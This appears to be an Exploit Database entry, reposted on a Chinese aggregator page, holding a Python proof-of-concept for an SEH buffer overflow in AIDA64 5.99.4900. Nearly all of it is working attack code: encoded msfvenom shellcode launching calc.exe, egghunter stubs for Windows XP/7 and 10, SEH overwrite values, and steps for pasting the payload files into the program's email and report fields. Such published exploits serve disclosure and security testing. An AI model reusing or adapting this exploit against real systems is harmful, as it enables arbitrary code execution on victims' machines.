AIDA64 Extreme / Engineer / Network Audit 5.99.4900 – SEH Buffer Overflow (EggHunter)

• Exploit Database
• 112 阅读

• 作者： Peyman Forouzan
  日期： 2019-04-02
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46636/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139

  #!/usr/bin/python # # Exploit Title: AIDA64 Extreme 5.99.4900 - SEH Buffer Overflow (EggHunter) # # Date: 2019-04-01# # Vendor Homepage: https://www.aida64.com # # Software Link: http://download.aida64.com/aida64extreme599.exe# # Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe# # Exploit Author: Peyman Forouzan # # Tested Version: 5.99.4900 # # Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit # # Special Thanks to my wife # # The program has SEH Buffer Overflow in several places.(this code show one of them)# # Note 1 : To optimize code, I've used a "stack pivot" that is the same in# # (Extreme, Engineer, Network Audit) Editions.# # So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4900 # # But the stack pivots in Business Edition are different. # # Note 2 : All the old versions of the program that are available on the sites like soft32.com, # # or in https://www.aida64.com/downloads/archive# # have the same vulnerabily in different offsets (for example version 5.70.3800 ) # # Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions. # # Steps : # #1- Run python code : Aida64-Extreme.py ( Three files are created ) # #2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt# # into "Display name" --> Ok# #3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt # # or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next# # --> Wait a minute --> Shellcode (Calc) open # #---------------------------------------------------------------------------------------------------------#   #------------------------------------ EGG Shellcode Generation---------------------------------------   bufsize = 292   #msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg egg ="w00tw00t" egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71" egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b" egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43" egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57" egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75" egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f" egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43" egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c" egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33" egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31" egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31" egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31" egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58" egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d" egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52" egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36" egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43" egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50" egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33" egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f" egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31" egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50" egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72" egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35" egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f" egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a" egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73" egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43" egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44" egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"   f = open ("egg.txt", "w") f.write(egg) f.close()   #---------------------------------- EGG Hunter Shellcode Generation------------------------------------ egghunter ="\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7" egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30" egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b" egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33" egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f" egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50" egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d" egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36" egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64" egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34" egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75" egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50" egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31" egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"   egghunter10 ="\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29" egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41" egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38" egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50" egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e" egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54" egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69" egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f" egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39" egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72" egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31" egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39" egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66" egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78" egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78" egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a" egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41"   jmpback = "\xe9\xdc\xfe\xff\xff"# jmp back nseh = "\xeb\xf9\x90\x90" # jmp Short back seh = "\x40\x15\x40"# Overwrite Seh - Golden Pivot !!   buffer= egghunter buffer += "\x41" * (bufsize-len(buffer)-len(jmpback)) buffer += jmpback buffer += nseh buffer += seh print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer) f = open ("egghunter-winxp-win7.txt", "w") print "[+] File created!" f.write(buffer) f.close()   buffer= egghunter10 buffer += "\x41" * (bufsize-len(buffer)-len(jmpback)) buffer += jmpback buffer += nseh buffer += seh print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer) f = open ("egghunter-win10.txt", "w") print "[+] File created!" f.write(buffer) f.close()